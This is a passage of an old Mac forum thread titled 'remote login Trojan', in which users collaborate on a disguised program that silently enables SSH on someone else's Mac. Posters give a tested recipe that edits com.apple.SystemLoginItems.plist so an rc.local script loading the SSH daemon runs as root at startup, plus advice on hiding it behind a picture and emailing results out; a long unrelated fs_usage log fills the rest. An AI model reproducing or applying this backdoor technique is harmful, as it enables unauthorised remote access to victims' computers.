Help - Search - Members - Calendar
Full Version: remote login Trojan
TSF - Mac Security Forums > Discussion > Programming
Pages: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14
callmenames
May 27 2008, 03:17 PM
That doesn't answer the question of how you are going to get someone to download it onto their computer if they are even able to do so. Nor about 100 other likely reasons why this would fail to work...
Oktane
May 27 2008, 04:22 PM
Nevermind you buzz killer, I found a startup script I can replace/edit, with Applescript accessible privileges so now I can skip the login.

I will share when I figure it out
callmenames
May 27 2008, 05:13 PM
I'm not pointing out the problems to be a buzz killer, I'm suggesting that perhaps it would be nice to start trying to overcome some of those problems or the likelihood of this approach working is very, very low.

Incidentally, StartupItems in Tiger and Leopard must be owned by root:wheel and set to chmod 755 or they will not actually run at startup AND the user will be notified. Eventually you will figure out that you can't set the ownership to root without being root/superuser.

Oh and did you get the web form email working? :)
Oktane
May 27 2008, 05:51 PM
Crap when I edited the file I was piggy backing a previous password entry, we really need to figure out a way to enable ssh without asking for authentication.

No I haven't even started working on the email thing.
callmenames
May 27 2008, 06:04 PM
QUOTE(Oktane @ May 27 2008, 03:51 PM) *
Crap when I edited the file I was piggy backing a previous password entry, we really need to figure out a way to enable ssh without asking for authentication.

No I haven't even started working on the email thing.


Good grief we're back to square 1.

I already told you a method of enabling SSH without asking for authentication. com.apple.SystemLoginItems.plist entries are run as root at startup, just prior to user login.

I already posted a fully working web form email AppleScript... page 10 of this thread I think. All you need to figure out is what URL to use.

callmenames
May 27 2008, 06:13 PM
QUOTE(Oktane @ May 27 2008, 03:51 PM) *
Crap when I edited the file I was piggy backing a previous password entry

When you are testing, sudo -k will invalidate the sudo timestamp.
Oktane
May 27 2008, 06:36 PM
I tested this and it worked:
1. Created rc.local
CODE
#!/bin/sh
launchctl load -w /System/Library/LaunchDaemons/ssh.plist


2. mv /Library/Preferences/com.apple.SystemLoginItems.plist
~/Desktop/com.apple.SystemLoginItems.plist

3. Inserted:

CODE
<dict>
                        <key>Path</key>
                        <string>~/Desktop/rc.local</string>
</dict>


4. mv ~/Desktop/com.apple.SystemLoginItems.plist
/Library/Preferences/com.apple.SystemLoginItems.plist

5. Restarted

That worked!

So I have to remove
CODE
        </array>
</dict>
</plist>

And add:
CODE
                         <dict>
                                   <key>Path</key>
                                   <string>~/the_path/rc.local</string>
                         </dict>
           </array>
</dict>
</plist>


Then move com.apple.SystemLoginItems.plist back
callmenames
May 27 2008, 07:05 PM
You're not really reading this thread are you?

QUOTE(callmenames @ May 20 2008, 06:03 PM) *
Yes, although what constitutes an 'executable file' or command varies depending on which part of the OS X startup process is active. For instance, Login Items are handled in much the way Finder would handle them. If Finder can't run something, it won't work as a Login Item. A command line for instance, won't work while an AppleScript would and it could issue a command line. Similarly, a Startup Item can't be an AppleScript although a shell script will work.

Launchctl is smart enough not to load the service twice (try it and see what it says.)

callmenames
May 27 2008, 07:31 PM
Sooo to get your rc.local to work you can do two things...
First, select the file and Get Info. Set it to "Open With..." Terminal, check "Always Open With".
Second, sudo mkdir -p /var/root/Desktop
Third, sudo ditto -rsrc ~/Desktop/rc.local /var/root/Desktop/rc.local
Then restart and the script will be opened by Terminal which will then run it (as root.)

lokin
May 27 2008, 07:55 PM
Nice callmenames...
lokin
May 27 2008, 07:56 PM
And when the picture doesn't appear and they go to re-download it?
It would then also need.
do application "Preview.app"
and then open a picture you attached.

Unless you're hoping that they will assume it's a faulty image, link, whatever.
callmenames
May 27 2008, 08:52 PM
QUOTE(callmenames @ May 27 2008, 05:31 PM) *
Sooo to get your rc.local to work you can do two things...
First, select the file and Get Info. Set it to "Open With..." Terminal, check "Always Open With".
Second, sudo mkdir -p /var/root/Desktop
Third, sudo ditto -rsrc ~/Desktop/rc.local /var/root/Desktop/rc.local
Then restart and the script will be opened by Terminal which will then run it (as root.)

Oh the other thing was to have an AppleScript run the shell script although obviously at that point you could just have the AppleScript do what you want to do.

I was wrong about not being able to use ~ in the path for an entry in com.apple.SystemLoginItems.plist... ~ does work and does go to the home folder of the autologin user (and presumably any user logging in.) The script is still run with an effective UID of 0 (root) but a real UID of the user account. So no need for the second and third steps above... just set the path to ~/Desktop/rc.local and leave it on your user's Desktop, it runs from that location as root. You would still need to set the the "Always open with" for the file so that it will launch Terminal. Which is extremely obvious and I'm sure not at all what you want, so... back to the AppleScript now? :)


Oktane
May 27 2008, 09:39 PM
I need some help, I changed the com.apple.SystemLoginItems.plist to match the path. Then I tried a applescript saved as script.scpt and script.app with the code:
CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist


Neither worked, Thanks for all the help so far!
andrewistheshit
May 27 2008, 09:51 PM
i didnt get what callmenames got.
i got this (below) thats not even a 20th of it but i dident want to copy any more.

Last login: Tue May 27 19:39:34 on ttys000
andrew-frees-imac:~ andrewfree$ fs_usage
'fs_usage' must be run as root...
andrew-frees-imac:~ andrewfree$
andrew-frees-imac:~ andrewfree$ sudo -s

WARNING: Improper use of the sudo command could lead to data loss
or the deletion of important system files. Please double-check your
typing when using sudo. Type "man sudo" for more information.

To proceed, enter your password, or type Ctrl-C to abort.

Password:
bash-3.2#
bash-3.2# fs_usage
19:39:59 pread 0.000015 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000010 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000010 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 PAGE_IN 0.000097 Dock
19:39:59 PAGE_IN 0.000078 Dock
19:39:59 PAGE_IN 0.000078 Dock
19:39:59 read 0.000603 Locum
19:39:59 fcntl 0.000006 mds
19:39:59 fcntl 0.000003 mds
19:39:59 fcntl 0.000002 mds
19:39:59 fcntl 0.000003 mds
19:39:59 fcntl 0.000002 mds
19:39:59 fcntl 0.000002 mds
19:39:59 fcntl 0.000002 mds
19:39:59 write 0.000023 Locum
19:39:59 fstat 0.000007 mds
19:39:59 open . 0.000016 mds
19:39:59 close 0.000006 mds
19:39:59 fstat 0.000003 mds
19:39:59 open . 0.000006 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000005 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000005 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000005 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000005 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000005 mds
19:39:59 close 0.000004 mds
19:39:59 getattrlist ry/QuickTime/qtupdate.log 0.000017 Veoh Player
19:39:59 getattrlist ces/QuickTime Preferences 0.000025 Veoh Player
19:39:59 getattrlist ry/QuickTime/qtupdate.log 0.000008 Veoh Player
19:39:59 getattrlist ces/QuickTime Preferences 0.000012 Veoh Player
19:39:59 RdData[async] 0.010753 W SyncServer
19:39:59 pread 0.010798 W SyncServer
19:39:59 pread 0.000013 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 fcntl 0.000008 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 close 0.000325 W SyncServer
19:39:59 stat private/var/tmp 0.000020 SyncServer
19:39:59 access private/var/tmp 0.000007 SyncServer
19:39:59 access mp/etilqs_VILSD5gcVxvHwTQ 0.000027 SyncServer
19:39:59 open mp/etilqs_VILSD5gcVxvHwTQ 0.000109 W SyncServer
19:39:59 statfs mp/etilqs_VILSD5gcVxvHwTQ 0.000010 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 unlink mp/etilqs_VILSD5gcVxvHwTQ 0.000057 SyncServer
19:39:59 stat private/var/tmp 0.000008 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_eOiJc6sLcU3UGzk 0.000022 SyncServer
19:39:59 pread 0.000004 SyncServer
19:39:59 fcntl 0.000004 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 pread 0.000010 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000051 W SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000006 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 fcntl 0.000006 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 close 0.000056 SyncServer
19:39:59 stat private/var/tmp 0.000016 SyncServer
19:39:59 access private/var/tmp 0.000007 SyncServer
19:39:59 access mp/etilqs_2rpL0ljLbxLZ49a 0.000025 SyncServer
19:39:59 open mp/etilqs_2rpL0ljLbxLZ49a 0.000073 SyncServer
19:39:59 statfs mp/etilqs_2rpL0ljLbxLZ49a 0.000008 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 unlink mp/etilqs_2rpL0ljLbxLZ49a 0.000054 SyncServer
19:39:59 stat private/var/tmp 0.000008 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_r84d44oRYbo4BeG 0.000022 SyncServer
19:39:59 pread 0.000003 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000004 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 close 0.000036 SyncServer
19:39:59 stat private/var/tmp 0.000009 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_0vIjS62mSuqRec9 0.000021 SyncServer
19:39:59 open mp/etilqs_0vIjS62mSuqRec9 0.000089 W SyncServer
19:39:59 statfs mp/etilqs_0vIjS62mSuqRec9 0.000010 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 unlink mp/etilqs_0vIjS62mSuqRec9 0.000053 SyncServer
19:39:59 stat private/var/tmp 0.000008 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_1nYDWxlcS74UepX 0.000018 SyncServer
19:39:59 pread 0.000003 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fstat 0.000004 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000004 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 close 0.000035 SyncServer
19:39:59 stat private/var/tmp 0.000009 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_003Wgzpm2RPyKFx 0.000021 SyncServer
19:39:59 open mp/etilqs_003Wgzpm2RPyKFx 0.000064 SyncServer
19:39:59 statfs mp/etilqs_003Wgzpm2RPyKFx 0.000008 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 unlink mp/etilqs_003Wgzpm2RPyKFx 0.000051 SyncServer
19:39:59 stat private/var/tmp 0.000008 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_euBMp3J1BdLB7N5 0.000019 SyncServer
19:39:59 pread 0.000003 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fstat 0.000045 W SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 fcntl 0.000004 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 close 0.000035 SyncServer
19:39:59 stat private/var/tmp 0.000009 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_gdwQg609f36OhBi 0.000019 SyncServer
19:39:59 open mp/etilqs_gdwQg609f36OhBi 0.000061 SyncServer
19:39:59 statfs mp/etilqs_gdwQg609f36OhBi 0.000008 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 unlink mp/etilqs_gdwQg609f36OhBi 0.000051 SyncServer
19:39:59 stat private/var/tmp 0.000008 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_rZdcNwviasTBfMK 0.000020 SyncServer
19:39:59 pread 0.000003 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000004 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 close 0.000034 SyncServer
19:39:59 stat private/var/tmp 0.000009 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_Ing44HXY6cJQ71k 0.000023 SyncServer
19:39:59 open mp/etilqs_Ing44HXY6cJQ71k 0.000059 SyncServer
19:39:59 statfs mp/etilqs_Ing44HXY6cJQ71k 0.000008 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 unlink mp/etilqs_Ing44HXY6cJQ71k 0.000050 SyncServer
19:39:59 stat private/var/tmp 0.000008 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_qeueJEVo2U78XsL 0.000022 SyncServer
19:39:59 pread 0.000003 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000004 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 close 0.000034 SyncServer
19:39:59 stat private/var/tmp 0.000009 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_Z21Tlo3cJM4kJKc 0.000020 SyncServer
19:39:59 open mp/etilqs_Z21Tlo3cJM4kJKc 0.000060 SyncServer
19:39:59 statfs mp/etilqs_Z21Tlo3cJM4kJKc 0.000008 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 unlink mp/etilqs_Z21Tlo3cJM4kJKc 0.000050 SyncServer
19:39:59 stat private/var/tmp 0.000008 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_52yVkd1ibIFF7iB 0.000020 SyncServer
19:39:59 pread 0.000003 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000004 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 close 0.000034 SyncServer
19:39:59 stat private/var/tmp 0.000009 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_PY7fKVfqQMEqY6T 0.000019 SyncServer
19:39:59 open mp/etilqs_PY7fKVfqQMEqY6T 0.000059 SyncServer
19:39:59 statfs mp/etilqs_PY7fKVfqQMEqY6T 0.000008 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 unlink mp/etilqs_PY7fKVfqQMEqY6T 0.000050 SyncServer
19:39:59 stat private/var/tmp 0.000008 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_FthnFAbLjckhZQk 0.000019 SyncServer
19:39:59 pread 0.000003 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 pread 0.000008 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 pread 0.000007 SyncServer
19:39:59 fcntl 0.000004 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 close 0.000035 SyncServer
19:39:59 stat private/var/tmp 0.000009 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_EkSUAgnb5Yar9nt 0.000020 SyncServer
19:39:59 read 0.015701 W fseventsd
19:39:59 open mp/etilqs_EkSUAgnb5Yar9nt 0.000149 W SyncServer
19:39:59 statfs mp/etilqs_EkSUAgnb5Yar9nt 0.000008 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 unlink mp/etilqs_EkSUAgnb5Yar9nt 0.000053 SyncServer
19:39:59 stat private/var/tmp 0.000014 SyncServer
19:39:59 access private/var/tmp 0.000006 SyncServer
19:39:59 access mp/etilqs_YiwrYcs2Y4RokAy 0.000022 SyncServer
19:39:59 pread 0.000003 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fstat 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 pread 0.000009 SyncServer
19:39:59 fcntl 0.000004 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 close 0.000036 SyncServer
19:39:59 close 0.000006 SyncServer
19:39:59 close 0.000075 SyncServer
19:39:59 aio_read 0.000007 Veoh Player
19:39:59 aio_error 0.000001 Veoh Player
19:39:59 read 0.017706 W Locum
19:39:59 write 0.000024 Locum
19:39:59 read 0.000596 Locum
19:39:59 write 0.000011 Locum
19:39:59 read 0.003208 W fseventsd
19:39:59 read 0.018954 W mds
19:39:59 fcntl 0.000004 mds
19:39:59 fcntl 0.000003 mds
19:39:59 fcntl 0.000002 mds
19:39:59 fcntl 0.000002 mds
19:39:59 fcntl 0.000002 mds
19:39:59 fcntl 0.000002 mds
19:39:59 fcntl 0.000002 mds
19:39:59 fcntl 0.000002 mds
19:39:59 fcntl 0.000002 mds
19:39:59 fcntl 0.000007 mds
19:39:59 fstat 0.000006 mds
19:39:59 open . 0.000015 mds
19:39:59 close 0.000006 mds
19:39:59 fstat 0.000003 mds
19:39:59 open . 0.000006 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000005 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000006 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000005 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000005 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000005 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000005 mds
19:39:59 close 0.000004 mds
19:39:59 fstat 0.000002 mds
19:39:59 open . 0.000005 mds
19:39:59 close 0.000004 mds
19:39:59 read 0.001365 W Locum
19:39:59 write 0.000013 Locum
19:39:59 read 0.000590 Locum
19:39:59 write 0.000011 Locum
19:39:59 select 0.000010 Brutal Gift
19:39:59 recvfrom 0.000010 Brutal Gift
19:39:59 read 0.000594 Locum
19:39:59 write 0.000011 Locum
19:39:59 select 0.000008 Brutal Gift
19:39:59 ioctl 0.000004 Brutal Gift
19:39:59 read 0.000601 Locum
19:39:59 select 0.000007 Brutal Gift
19:39:59 sendto 0.000042 Brutal Gift
19:39:59 ioctl 0.000003 Brutal Gift
19:39:59 select 0.000006 Brutal Gift
19:39:59 ioctl 0.000002 Brutal Gift
19:39:59 RdData[async] 0.004433 W kernel_task
19:39:59 aio_suspend 0.004395 W Veoh Player
19:39:59 aio_error 0.000001 Veoh Player
19:39:59 aio_return 0.000001 Veoh Player
19:39:59 WrData[async] 0.006203 W SyncServer
19:39:59 unlink Local/data.syncdb-journal 0.010374 W SyncServer
19:39:59 fcntl 0.000007 SyncServer
19:39:59 fcntl 0.000003 SyncServer
19:39:59 fcntl 0.000002 SyncServer
19:39:59 getattrlist ry/QuickTime/qtupdate.log 0.000014 Veoh Player
19:39:59 getattrlist ces/QuickTime Preferences 0.000020 Veoh Player
19:39:59 close 0.000028 SyncServer
19:39:59 write 0.000026 Locum
19:39:59 read 0.000837 W Locum
19:39:59 write 0.000015 Locum
19:39:59 read 0.000614 W Locum
19:39:59 write 0.000011 Locum
19:39:59 read 0.000600 Locum
19:39:59 write 0.000010 Locum
19:39:59 read 0.000794 W Locum
19:39:59 write 0.000012 Locum
19:39:59 read 0.000602 Locum
19:39:59 write 0.000012 Locum
19:39:59 read 0.000600 Locum
19:39:59 write 0.000011 Locum
19:39:59 read 0.000593 Locum
19:39:59 write 0.000011 Locum
19:39:59 read 0.000603 Locum
19:39:59 write 0.000013 Locum
19:39:59 read 0.000594 Locum
19:39:59 write 0.000010 Locum
19:39:59 read 0.000595 Locum
19:39:59 write 0.000016 Locum
19:39:59 read 0.000595 Locum
19:39:59 write 0.000010 Locum
19:39:59 read 0.017734 W fseventsd
19:39:59 read 0.017715 W mds
19:39:59 getattrlist ry/QuickTime/qtupdate.log 0.000018 Veoh Player
19:39:59 getattrlist ces/QuickTime Preferences 0.000024 Veoh Player
19:39:59 getattrlist ry/QuickTime/qtupdate.log 0.000008 Veoh Player
19:39:59 getattrlist ces/QuickTime Preferences 0.000012 Veoh Player
19:39:59 fcntl 0.000010 mds
19:39:59 sendto 0.000016 usbmuxd
19:39:59 read 0.000006 iTunes
19:39:59 read 0.000003 iTunes
19:39:59 read 0.000003 iTunes
19:39:59 read 0.000003 iTunes
19:39:59 sendto 0.000008 usbmuxd
19:39:59 read 0.000061 W iTunes
19:39:59 read 0.000002 iTunes
19:39:59 read 0.000003 iTunes
19:39:59 read 0.000003 iTunes
19:39:59 socket 0.000013 iTunes
19:39:59 connect private/var/run/usbmuxd 0.000024 iTunes
19:39:59 ioctl 0.000003 iTunes
19:39:59 sendto 0.000004 iTunes
19:39:59 accept 0.000008 usbmuxd
19:39:59 close 0.000007 usbmuxd
19:39:59 lstat 535014ea4d7faae5a02c71488 0.000067 fseventsd
19:39:59 lstat /private/var/tmp 0.000007 fseventsd
19:39:59 lstat upport/SyncServices/Local 0.000006 fseventsd
19:39:59 lstat 535014ea4d7faae5a02c71488 0.000008 fseventsd
19:39:59 lstat /private/var/tmp 0.000004 fseventsd
19:39:59 lstat upport/SyncServices/Local 0.000005 fseventsd
19:39:59 lstat 535014ea4d7faae5a02c71488 0.000021 fseventsd
19:39:59 lstat /private/var/tmp 0.000005 fseventsd
19:39:59 lstat upport/SyncServices/Local 0.000005 fseventsd
19:39:59 ioctl 0.000006 usbmuxd
19:39:59 sendto 0.000014 usbmuxd
19:39:59 select 0.010584 W usbmuxd
19:39:59 recvfrom 0.000008 usbmuxd
19:39:59 select 0.000017 usbmuxd
19:39:59 recvfrom 0.000004 usbmuxd
19:39:59 recvfrom 0.000003 usbmuxd
19:39:59 sendto 0.000005 usbmuxd
19:39:59 select 0.000055 W usbmuxd
19:39:59 recvfrom 0.000004 usbmuxd
19:39:59 fstat 0.000006 mds
19:39:59 open . 0.000015 mds
19:39:59 close 0.000007 mds
19:39:59 sendto 0.000011 usbmuxd
19:39:59 close 0.000006 iTunes
19:39:59 recvfrom 0.000005 iTunes
19:39:59 ioctl 0.000003 iTunes
19:39:59 sendto 0.000006 iTunes
19:39:59 sendto 0.000005 iTunes
19:39:59 sendto 0.000005 iTunes
19:39:59 sendto 0.000005 iTunes
19:39:59 close 0.000010 iTunes
19:39:59 close 0.000004 iTunes
19:39:59 sendto 0.000006 iTunes
19:39:59 select 0.001952 W usbmuxd
19:39:59 recvfrom 0.000005 usbmuxd
19:39:59 recvfrom 0.000003 usbmuxd
19:39:59 sendto 0.000007 usbmuxd
19:39:59 recvfrom 0.000006 usbmuxd
19:39:59 recvfrom 0.000003 usbmuxd
19:39:59 select 0.000154 W usbmuxd
19:39:59 recvfrom 0.000005 usbmuxd
19:39:59 close 0.000010 usbmuxd
19:39:59 getattrlist ry/QuickTime/qtupdate.log 0.000016 Veoh Player
19:39:59 getattrlist ces/QuickTime Preferences 0.000019 Veoh Player
19:39:59 sendto 0.000016 usbmuxd
19:39:59 close 0.000007 iTunes
19:39:59 recvfrom 0.000005 iTunes
19:39:59 close 0.000004 iTunes
19:39:59 recvfrom 0.000004 iTunes
19:39:59 close 0.000004 iTunes
19:39:59 sendto 0.000007 iTunes
19:39:59 select 0.003878 W usbmuxd
19:39:59 recvfrom 0.000007 usbmuxd
19:39:59 recvfrom 0.000002 usbmuxd
19:39:59 sendto 0.000008 usbmuxd
19:39:59 select 0.000100 W usbmuxd
19:39:59 recvfrom 0.000005 usbmuxd
19:39:59 sendto 0.000012 usbmuxd
19:39:59 close 0.000007 iTunes
19:39:59 recvfrom 0.000005 iTunes
19:39:59 sendto 0.000010 usbmuxd
19:39:59 close 0.000006 iTunes
19:39:59 recvfrom 0.000006 iTunes
19:39:59 close 0.000004 iTunes
19:39:59 sendto 0.000006 iTunes
19:39:59 select 0.003127 W usbmuxd
19:39:59 recvfrom 0.000007 usbmuxd
19:39:59 recvfrom 0.000003 usbmuxd
19:39:59 sendto 0.000008 usbmuxd
19:39:59 select 0.000098 W usbmuxd
19:39:59 recvfrom 0.000005 usbmuxd
19:39:59 read 0.028027 W Locum
19:39:59 write 0.000039 Locum
19:39:59 read 0.000703 W Locum
19:39:59 write 0.000016 Locum
19:39:59 read 0.000599 Locum
19:39:59 write 0.000012 Locum
19:39:59 read 0.000867 W Locum
19:39:59 getattrlist ry/QuickTime/qtupdate.log 0.000020 Veoh Player
